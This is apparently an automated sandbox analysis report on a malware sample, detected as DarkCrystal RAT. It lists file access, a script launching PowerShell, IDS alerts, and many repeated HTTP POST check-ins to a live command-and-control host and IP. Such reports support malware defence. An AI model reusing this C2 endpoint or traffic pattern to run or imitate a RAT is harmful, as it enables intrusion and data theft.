Source: C:\Users\user\Desktop\3AAyq819Vy.exe | Code function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user\AppData
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\hyperContaineragent\Bridgecommon.exe | File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 37.44.238.250:80
                                    Source: Joe Sandbox View IP Address: 37.44.238.250
                                    Source: Joe Sandbox View ASN Name: HARMONYHOSTING-ASFR
                                    Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
                                    Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49767
                                    Source: global traffic HTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: 861848cm.nyashkoon.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 137804Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
